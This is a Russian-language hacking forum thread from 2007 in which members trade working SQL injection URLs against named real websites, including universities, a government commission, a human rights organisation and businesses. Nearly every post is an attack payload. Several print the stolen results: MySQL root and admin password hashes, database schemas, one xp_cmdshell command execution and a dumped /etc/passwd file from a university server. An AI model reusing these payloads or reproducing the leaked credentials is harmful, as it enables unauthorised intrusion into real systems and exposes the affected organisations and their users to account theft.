SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Хенк
    http://www.albatros-travel.dk/main.asp?product_id=1'+or+1=(@@version+);exec+master..xp_cmdshell+[dir+C:\]--
     
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    угу мы такие хекеры...

    http://www.unpan.org/autoretrieve/regional_focus.asp?region=europe&focus=1'%20or%201%3D%28select%20%27records%3A%27%2bcast%28count%28*%29%20as%20nvarchar%29%20from%20stellent..Users%20%20%20%29--

    Плак Плак (((=
     
  3. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    www.maineservicecommission.gov
    Code:
    http://www.maineservicecommission.gov/MVF/article.php?ID=-1+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12,13/*
    
    job.nenu.edu.cn
    Code:
    http://job.nenu.edu.cn/student/schshow.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,user,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+mysql.user/*
    
    root:69aa6ce56e31ae92
     
    #2703 The_HuliGun, 15 Jul 2007
    Last edited: 15 Jul 2007
    1 person likes this.
  4. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    http://panicprice.com.ua/?event=search_like_product&id=-168682+union+select+concat_ws(0x203a20,table_schema,table_name)+from+information_schema.tables--&cId=-675
     
  5. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    http://www.estcoenterprises.com/display_lines.php?cat_id=-9999+union+select+1,2,password+from+users/*

    Толи я чего, толи нету таблицы login(и её подобные) есть тока passw... И пасс подходит как логин\пасс
    http://www.estcoenterprises.com/admin/
     
  6. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    http://www.mvservice.ru/price.php?do=5&open=380&popen=-1712+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--&PHPSESSID=bf6f6d643c1f4e053c50090464152c87

    Четвертая версия, вывод в заголовке страницы
     
  7. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    http://www.devmaster.net/ - сайт программеров... =(

    http://www.devmaster.net/articles.php?catID=-6+union+select+1,convert(concat(user(),0x3a,database(),0x3a,version())+using+latin1)/*


    }{.3. 4e:
    http://www.sev.com.au/news.php?articleid=-3608+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12


    Human Rights Resource Center:
    http://www.hrusa.org/field/listings.php?catid=-2+union+select+concat(version(),0x3a,database(),0x3a,user(),0x3a,name,0x3a,password),2,3,4+from+users/*
    admin:59395e208ea9aa41f94f1cfabe62dcad

    iPod? =)))))))
    http://www.ipoding.com/index.php?catid=-11+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
    #2707 Dr.Frank, 15 Jul 2007
    Last edited: 15 Jul 2007
  8. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,concat_ws(0x3a,login,psw)+from+megaload_auth+limit+0,1/*
    Code:
    http://dj.chem.msu.ru/person.php?id=-165+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*
     
    #2708 Extremal, 15 Jul 2007
    Last edited: 16 Jul 2007
    2 people like this.
  9. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    http://www.hairstudio.ro/sex.php?id=-5+union+select+1,count(table_name),user(),4+from+information_schema.tables/*
    user=\
     
  10. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Duke News =\
    Code:
    http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(),concat(user,0x3a,password),7,8+from+mysql.user/*
    root:623460e26f081bbc
    web:761b2fc844890384
    mnogosearch:0547d8b07eba42f3
    =\
     
  11. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    =\\

    email+password
     
  12. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    David Levine's Economic and Game Theory Page =\
    Code:
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13+from+mysql.user/*
    http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables/*
    

    root:7cf9857402f566aa
    design:7cf9857402f566aa
    replicate:7cf9857402f566aa
    access:55d97f31500ff4ea
    levucla:6de799125318a5b4
    xjfllehhq208951:57efde0a663a5956
    xfjklmghq188885:0bb7efbf598cc88a
    xbiffikhq542373:72d927ea51170e2b
    xgbffgkhq522308:3d012a8c0201b3b8
     
  13. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    http://www.eyeforpharma.com/index.asp?ch2=174+and+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('SubscriberContent_XREF','SUBSCRIBERS','SUBSCRIBERS_XREF','vwTravel_Contact','SubscribersBusiness_XREF','surround','SurveyAnswers','AeroUpload','AllArticles_DisplayTime_View','AREAS','AREAS_CHANNELS_XREF','AREASCHANNELSVIEW','Author_Profile','AUTHORS','authors_xref','AutoPrintSubs','AutoResponse','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF','Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNELS','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','Counters','DailyNewsPopup','delegate_details','delegates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF','DIRECTORY_SUBCATEGORY_XREF','directoryxls','discussion_delegates','DNES3_Config','DNES3_Mode3','DNEServer_Config','dtproperties','Ebusiness','EMailArticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIBITING','Expo','featuredContent','FeaturedContent2','feedback','FifteenWords','FrontPage_LocationMatrix','FrontPage_Services','Gerry_temp','ICDirectoryXPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_View','MCONNECT','messages','MforMobileNewsletter_ChannelExtract','news','Newsletter','Newsletter_Clips_Comment_View','Newsletter_ClipsComments','Newsletter_ClipsComments_Channel','Newsletter_ClipsComments_XREF','Newsletter_MeetPress','Newsletter_MeetPress_View','Newsletter_Reports_View','Newsletter_Reports_XREF','Newsletter_Responder','NewsletterArchiveFiles','OnlineMagazines','OPENING','PANEL','PANELSPEAKERS','PASSWORD','PERSON','PRESENTATION','presentations','PRESENTER','PublishedNewsletters_Reports_View','RECRUITMEN','RECRUITMENT','REGISTER','relatedstories','REPORT','REPORT_AREAS_XREF','Report_Content_View','REPORT_DISPLAY','REPORT_POLL_XREF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_XREF','ReportCompanies_XREF','ReportLinkedCompanies','Reports_By_Author_View','Resource_Articles','Results','RESUMES','SendToFriendAddresses','SHAREPRICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sheet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_REFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF','SUBCHANNELS','SurveyQuestion','sysconstraints','syssegments','t_jiaozhu','tbl_IPCapture','tbl_Visitor','tblAerospaceMembers','tblAuto_Contact_Details','tblAuto_Response_Category','tblAuto_Response_Conference','tblAuto_Response_Conferences','tblAuto_Response_Counter','tblAuto_X_REF','tblDirCategories','tblDirCompanies','tblDirCompanyCategoryXref','tblDirCompanyCustomerXref','tblDirCompanyPartnerXref','tblDirWebsite','tblEmail_Wizard','tblMobile_Delegates','tblPharma_Contact_Details','tblPharma_PP_Details','tblPharma_Response_Category','tblPharma_Response_Conferences','tblPharma_Response_Counter','tblPharma_Subscriber','tblPharma_X_REF','tblTransport_Contact_Details','tblTransport_Response_Category','tblTransport_Response_Counter','tblTransport_X_REF','tblTravel_Contact','tblTravel_Contact_Details','tblTravel_Contact_PostEvent','tblTravel_Contact_PostEvent2005backup','tblTravel_Contact2005backup','tblTravel_ContactMessage','tblTravel_ContactMessage2005backup','tblTravel_Country','tblTravel_Event','tblTravel_Response_Category','tblTravel_Response_Conferences','tblTravel_Response_Counter','tblTravel_User','tblTravel_User_Event','tblTravel_X_REF','Telematic','toplevel','toplevel','tpploPOLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RESULTS','TRANSLATION','TRANSLATIONS','transport_xml_feed_view','transportsubscribers','TRAVEL%20SEMINAR%20LIST','travel_delegates','travel_events','travel_events_xref','travel_messages','TravelRHS','tvp1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPersonalised','VisitorLogins','Visitors','vw_DailyMailerSubscribers','WAP','WebsiteComment','xref_SubscriberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))--


    Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2)

    EMailArticleUsers

    OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter)

    PASSWORD (PERSONCODE, EVENTCODE, CHECKED)
     
  14. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    Code:
    http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
    Code:
    http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8/*
     
  15. dudits

    dudits Banned

    Joined:
    2 Jun 2007
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    http://info.l2r.ru/?part=items&id=1+or+1=@@version--

    может кто подсказать что дальше делать, чтобы получить доступ к бд сайта? что то не получается у меня:(
     
  16. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Princeton University Program for Law and Public Affairs
    root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

    "/etc/passwd"
    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/openpkg/lib/openpkg/bash
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    mysql:x:27:351:MySQL Server:/var/lib/mysql:/bin/bash
    openpkg:x:42000:42000:/openpkg OpenPKG (management):/openpkg:/openpkg/lib/openpkg/bash
    openpkg-r:x:42001:42001:/openpkg OpenPKG (restricted):/openpkg:/openpkg/lib/openpkg/bash
    openpkg-n:x:42002:42002:/openpkg OpenPKG (non-privileged):/openpkg:/openpkg/lib/openpkg/bash
    csgweb:x:61400:36::/home/csgweb:/bin/bash
    +agvols::0:0:::
    +facphoto::0:0::/var/local/as/home/facphoto:
    +puombuds::0:0:::
    +crosley::0:0:::
    +daveh::0:0:::
    +fleming::0:0:::
    +nmcstaff::0:0:::
    +oitdas::0:0:::
    +pucap::0:0:::
    +serge::0:0:::
    +stevea::0:0:::
    +fausey::0:0:::
    +albin::0:0::/var/local/as/home/albin:
    +agvols::0:0::/var/local/as/home/agvols:
    +officehr::0:0::/u/officehr:
    +mdmuzzie::0:0::/u/mdmuzzie:
    +acla06::0:0::/u/acla06:
    +genpurch::0:0::/u/genpurch:
    +uait::0:0::/var/local/as/home/uait:
    +pia::0:0::/u/pia:
    +tafsir::0:0::/u/tafsir:
    +transreg::0:0::/u/transreg:
    +afrstds::0:0::/u/afrstds:
    +restudy::0:0::/u/restudy:
    +odc::0:0::/u/odc:
    +jkchu::0:0::/u/jkchu:
    +newmedia::0:0::/u/newmedia:
    +ims::0:0::/var/local/as/home/ims:
    +eeweb::0:0::/var/local/as/home/eeweb:
    +eewebs::0:0::/var/local/as/home/eewebs:
    +philosph::0:0::/var/local/as
    
    Httpd.conf
     
  17. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    ГЫГЫ типо сайт для ИТ спецов:)
     
    1 person likes this.
  18. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    вот так лучше..

    Code:
    http://www.lookit.biz/news.php?viewcount=300&viewtype=3&pt=-1+union+select+1,2,3,concat_ws(char(58),acc_login,convert(acc_pwd%20using%20cp1251),acc_email),5,6+from+account/*
    Тока никак не могу подобрать кодировку пароля :(
     
  19. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    Вот тут посмотрите
    http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*
     
  20. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Code:
    http://blogs.xnet.lv/index.php?zoomzina=-2532+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    
     
Thread Status:
Not open for further replies.